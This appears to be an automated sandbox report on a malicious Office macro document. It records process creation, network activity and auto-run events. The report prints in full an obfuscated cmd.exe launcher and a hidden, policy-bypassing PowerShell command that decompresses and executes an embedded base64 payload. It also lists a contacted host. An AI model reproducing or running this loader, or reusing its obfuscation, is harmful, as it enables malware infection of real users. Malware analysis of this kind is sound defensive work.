c5e3ea84...ba3a

Severity	Category	Operation	Classification
4/5	Process	Creates process	-
Creates process "cmd /c C%PrOGRaMFIlES:~ -7,1%D, , /V:On ,,/%aPPdAta:~-7,1% " , (Se^T j1=^Ew-obje^ct I^o.c^OMp)& (^sET ^ ^J^F^O6=G^('VZBba8^IwGIb/^SpA^O^E^remtR5^Aix)&& (^s^e^t c^WSV=^A^rm^U)&& (Se^T ^ ^BW7=^XV)&( ,, , ,, (^SEt ^ C^ij=^vQN) , ,, )& (Set q^X=^i^I^))&&( , (^set ^ 8^i47=^ ^{`$_), ,, )&&(^s^Et ^ ^c^wH=^kqa02Wx^1/v^fFwy52+7z^fe^+)&& (^SEt ^q0^C^c=^9)&& (SE^T ^ ^OZ=.Co^MpR^ES)&( , , , ,, (s^E^T ^ ^ ^U19=e^a) , , )&( , (set ^8R=O) , )&&( ,(SE^T ^ ^xm=^h) )&& ( , (^s^e^t v^F=^s ^h^i^dDe), )& (S^e^t ^ep3A=^Q^OyR2U^JM)&(, ,, ,,(Se^T G1^yS=^4^oTe1Nn) , )&( (s^Et ^ r^Y=uqSZ^q^t^H7Njw) , )&( , , ,(S^E^T ^a^z8=N.^D^efLa^tesTR) , )& (^SET ^ b^1=^M^()&& (s^eT ^ D^RKS=FI^l^E^ -NoL^ogO )&& (^s^eT q^G=.^I)&& (^S^ET ^Rw=2ZZ^2)&& (S^Et G^Y=CA^C0g^IO)& ( (S^ET ^ e5^S=^`^$P^S^HO^ME[30]+'x'^)""^\"" ), , , )& (^se^t b^aCI=4k^Bwy)&& (,, , (sE^T ^ ^LK=f^R^o^m^ba), )&&(sE^t ^lPo=^([C^hAr]44^).T^oSTRIng)&& (, (s^Et Op^1=4) , )&&(se^T ^ ^E^f=a^f^tO^sH0^5)&(SE^T LI=foRE^ach^-)&&(^SeT ^ ^dv=D)&( , (Se^T ^ ^6rH^Y=^5+8) , ,, , , )&&( , , , (^Se^T ^ dn=Y/D^6) , )&& (^SE^T ^Vp^05=n^oPR)&& (, (^set ^AN=[s^ysTe^m.I^O.ME), ,,, , )&& ( ,(s^E^T ^ ^G5Q1=-^wINDO^w), )&( , ,, (s^ET 7z=o^CESs^ ) , )& (^SeT bO^q=^o^.stReAMRE^ADeR)&& ( , (Se^T ^DG=s^uB4) ,)&&( , (sE^t LI^j=^dap^D0) , )& (SE^t a^Xch=Ho^M^e)&& (S^Et ^ ^Z13= ""\""^(n)&&(, (s^ET e^q=^7) , , , )&& ( , (s^et eZ^P=o) , )&&( , (s^ET DQ=sHO^M^e) ,,, ,, )&& (s^ET ^ r^M=W^M^IC.)& ( (^SET uq^LY=]::^d^EC), , , )&& ( (s^ET ^ l^6e=b^1) , )&& (sE^t P^d^J6=[^2^1]^+$Ps)&&( ,(^SET ^ ^3B=0^dG^IO^e) ,, , , , )&& (^S^Et ^ Zz^t=g^klAj)&& (^sEt s^O= ^'CA^ll'^ ^'cRe^Ate^' ""^po)& (^SeT ^ q^2=0v^5W)&&(^se^T ^ ^A2=Ea^cH-^obj)&& ( ,(^SE^t ^ Co^Jf=^e) ,,,)&(^sEt ^ ^e^yWN=j^D8h)&&( ,(s^ET ^ ^z^RJ=^K5) , , )&& (^SeT J^6=^Fjr^iXLMf5)& ( , (s^ET ^ J^Z=1^z) ,, ,, , )&& (,(S^eT ^M^t=/D^+iA1Um^k6y^RKXmH) ,)&&( , ,,, , (^sEt 3^M^K^1=obj^ECt{nE^w^-o^bj^e), )& (se^T g^BQ=s^i)& (^seT ^ ^aMG=^u)& ( , ,, (^sE^T ^ ^aw^yI=^l) , )&( , (Se^t ^ ^ir^1^V=^h) )& (, , ,(S^Et uU^H=n^ ^ ^^^&^ ^(^ ), )&& ( , (S^Et o^JV=^^^\|^ fOR),)&& (^S^e^t v^Z^c=$^p^S)&& (s^et ^ ^g^Vkp=^6)& ( , (SE^T ^CY=^4) , )&& (S^et 9c^u^B=^ )&& (se^t ^ ^Rz=^SS )&& (s^et ^ z^R=^G4G^u^tW)&&( , (se^T ^ gx^b=b^Yp) ,)& ( , (SE^t ^ ^a^g=z^P), )&&(, , , , , (S^eT sZ^G=Nt^Er^ac ^-), )& ( , (^sEt l^V^p=^OmPre^S^s^ ^)^ ) ,)& ( ,(^S^ET x^dNR=bg8^r^j), )&(,(s^E^T ^ l^R=^Ext^.eNcO) ,)&& (se^T ^ c^g=W^e^r^SH^e^ll^ -N^O)&& (^s^ET ^ OE^9^Q=DS^hyxy^yV2Apb^uy)&& ( (sET ^ Sq^5^s=Mo^RY^S^T^RE^a^m] ^[C^On^vER), )&& ( , (s^ET x^S=^re^ss^i), )& (S^eT p^v=^) "")&& ( , , , , ,(Se^t ^ I^G4^Q=^CT), )&&( , (S^ET ^ B^9s=^exe pR) ,)& (, (sE^T ^s^Hnp=0M^y), , , )&& (, (sE^T ^ ^Je=^m8) , )& (Se^t ^ bv=fa^qfNGZQobl^CJ^p)&&( , (se^T ^ q8=^v^v) , )&& (Se^T ^ ^S^l=Q^VH^cO8^e1hjBC^Xsd1^fexS2i)&& ( ,(s^ET ^ ^rj^UN=ni) , )& ( (SE^t ^H8^O=^QBL^9tiq^E^M^8^utN) ,, , )& (,(s^et bC^0=h^K) ,)&& ( , , ,, , (s^ET ^cI=^(^ ^`$^_""\"" ) , )&& (, ,, (^S^et ^ID=^21^]+), )&&(^sET ^ ^Dq4G=l^Ay^v^Y8Gg6lQqsD^4Yq^Rj^O)&& ( , (^SEt ^ Ea^u=S) , )&( ,(^s^Et ^Z^HTE=0^f), , , , , )&(^S^eT ^cN^Vz=^L1)& (^se^t ^oP8=p)& ( ,(^SeT ^ UQ7^k=^s^e64sTrIN), )&& (, , , , , (SE^T ^ ^7^2=^cP^V) , , , , ,)& (^SE^T ^cOyd=^RIng^(^) ^ )& (Se^T ^ X^j=+^ )&&( ,(S^eT ^Eh^p=^-ExEC^Ut ) , )& ( ,(^S^et ^h^g=+ ""\""[^sys^t^E^M^.^t), )& ( , (s^E^t ^ I1=W^A^Hn^u0^avhW^w^4c38X6) ,,, , ,)& (^seT ^ ^R5qC=^'^)^()& (, (SEt 3^C^he=^^^\|) ,)&&(s^eT ^ HJ^VR=^ee57)&& (, (se^t ^ ^olr8=^}) , )& (,(S^Et ^I^r=^ON^.COmPR),)& (S^et ^3R^Y=^(^[ChA^r]44^))&(S^et cni^h=^E)&&(^s^eT 0^A=c^t S^Y^s^T^EM)&& (, (^Set ^ J^V^w=^od^E) , )&(^s^ET g^I=p^b^RXN^T^S)&& (^Set ^ us6=+00^z)& ( , , , (s^Et ^ C^d^J=A^p) ,)&& (SE^T bI^He=.T^oS^T)&(, (s^eT JG^A=T^]::), )&&(se^T ^ L^b=ho^M^E[34]+)&& ^sEt p^VZ=""&(, (^seT ^ ^6vzH=a) , )&( , (S^eT ^u5=^E3Kyvr^/E) ,)&&( ,(^seT ^rp=^iN^G]::^aS^C), , , )& ( ,(Set m^Lwq=U^5^EyC^8^='^)""\"" + ), , , )&& (S^ET ^ ^bn=^)^ ^+ ""\""^[^IO)&( ,(S^eT ^ c^LM=M9^ArXoE^w),)& (Se^T ^ G^U=^^^\|^ )&& (S^et ^ b^HT=[)&( , (s^Et c2^Q=.rE^ad^Toen^d^(^) }^)) ,, ,)&( ,(se^t ^i8T3=^(),)&& (sE^T ^0zSA=B0/^W^9pYXW^t^tmz3U^fr^So^a)&&( , , , (sE^t ^ Eh=Z^ttA), ,, ,, )& (^S^eT ^ ^ ^VDG=N^M)&(, (Se^T ^ D^vI=ES^sI^o) )&& ( (Se^t O^c^W^L= ^^^&^(^ ^`$),)&& (, , , , ,(SE^T 3^y=I^hv) , )&(^Set q^Xu=3^D^J^dlB6l^MtdrCqa^KOl0P)& (, ,,,,(^se^T ^ ^ ^Zb='^X) , , )&& , ca^LL ,, SeT q4j=%r^M%%B^9s%%7z%%s^O%%c^g%%^rj^UN%%sZ^G%%^Vp^05%%^8R%%D^RKS%%^Eh^p%%gx^b%%^6vzH%%^Rz%%9c^u^B%%^G5Q1%%v^F%%uU^H%%v^Z^c%%a^Xch%%P^d^J6%%L^b%%^Zb%%^R5qC%%^Z13%%j1%%x^S%%eZ^P%%^a^z8%%^U19%%b^1%%^AN%%Sq^5^s%%JG^A%%^LK%%UQ7^k%%^J^F^O6%%bv%%us6%%^c^wH%%c^WSV%%C^d^J%%G^Y%%^q0^C^c%%^e^yWN%%^Z^HTE%%G1^yS%%^ep3A%%^ir^1^V%%l^6e%%Zz^t%%^BW7%%LI^j%%^aMG%%I1%%J^6%%^cN^Vz%%C^ij%%b^aCI%%OE^9^Q%%J^Z%%^DG%%q^Xu%%^E^f%%x^dNR%%g^I%%3^y%%^S^l%%dn%%^7^2%%^H8^O%%q8%%^u5%%^s^Hnp%%^aw^yI%%c^LM%%^0zSA%%Op^1%%^Dq4G%%^Rw%%r^Y%%^z^RJ%%^g^Vkp%%bC^0%%^3B%%^a^g%%^6rH^Y%%^CY%%^M^t%%Ea^u%". ... VTI Actions Go to function call
Creates process "C:\Windows\system32\cmd.exe". ... VTI Actions Go to function call
Creates process "C:\Windows\System32\Wbem\WMIC.exe". ... VTI Actions Go to function call
Creates process "poWerSHell -NOniNtErac -noPROFIlE -NoLogO -ExECUt bYpaSS -wINDOws hidDen & ( $pSHoMe[21]+$PshoME[34]+'X')( "\"(nEw-object Io.cOMpressioN.DefLatesTReaM([sysTem.IO.MEMoRYSTREam] [COnvERT]::fRombase64sTrING('VZBba8IwGIb/SpAOEremtR5AixfaqfNGZQoblCJp+00zkqa02Wx1/vfFwy52+7zfe+ArmUApCAC0gIO9jD8h0f4oTe1NnQOyR2UJMhb1gklAjXVdapD0uWAHnu0avhWw4c38X6FjriXLMf5L1vQN4kBwyDShyxyyV2Apbuy1zsuB43DJdlB6lMtdrCqaKOl0PaftOsH05bg8rjpbRXNTSIhvQVHcO8e1hjBCXsd1fexS2iY/D6cPVQBL9tiqEM8utNvvE3Kyvr/E0MylM9ArXoEwB0/W9pYXWttmz3UfrSoa4lAyvY8Gg6lQqsD4YqRjO2ZZ2uqSZqtH7NjwK56hK0dGIOezP5+84/D+iA1Umk6yRKXmHSZttA7m80v5WheG4GutWee57U5EyC8=')"\" + ([ChAr]44).ToSTRIng() + "\"[IO.CoMpRESsiON.COmPRESsIoNModE]::dECOmPreSs ) \| foREach-objECt{nEw-object SYsTEM.Io.stReAMREADeR( `$_"\" + ([ChAr]44).ToSTRIng() + "\"[systEM.tExt.eNcODiNG]::aSCiI)}\| fOREacH-objECT {`$_.rEadToend() })\| &( `$psHOMe[21]+`$PSHOME[30]+'x')"\" ) ". ... VTI Actions Go to function call
3/5	Network	Performs DNS request	-
Resolves host name "images2.imgbox.com". ... VTI Actions Go to function call
3/5	Network	Connects to remote host	-
Outgoing TCP connection to host "66.254.122.100:443". ... VTI Actions Go to function call
2/5	VBA Macro	Executes macro on specific worksheet event	-
Executes macro automatically on target "workbook" and event "open". ... VTI Actions Go to macro
1/5	Process	Creates system object	-
Creates mutex with name "Global\.net clr networking". ... VTI Actions Go to function call
1/5	VBA Macro	Contains Office macro	-
Office document contains a VBA macro. ... VTI Actions Go to file details

Before

After